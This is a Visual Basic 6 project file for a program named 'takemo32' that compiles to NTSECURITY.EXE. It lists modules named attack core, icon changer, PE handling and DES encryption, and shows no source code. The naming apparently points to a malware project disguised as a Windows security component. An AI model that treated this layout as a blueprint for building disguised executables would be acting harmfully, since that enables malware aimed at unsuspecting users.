Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\system32\stdole2.tlb#OLE Automation
Form=frmMain.frm
Module=modWindowEnums; modWindowEnums.bas
Module=modAttackCore; modAttackScript.bas
Module=modMain; modMain.bas
Module=modDES; modDataEncryptionStandard.bas
Module=IconChanger; IconChanger.bas
Module=PE; PE.bas
Module=modIconKo; modIconKo.bas
IconForm="frmMain"
Startup="Sub Main"
HelpFile=""
Title="NTSECURITY"
ExeName32="NTSECURITY.EXE"
Command32=""
Name="takemo32"
HelpContextID="0"
CompatibleMode="0"
MajorVer=2
MinorVer=1
RevisionVer=319
AutoIncrementVer=1
ServerSupportFiles=0
VersionCompanyName=" "
VersionFileDescription=" "
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=-1
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
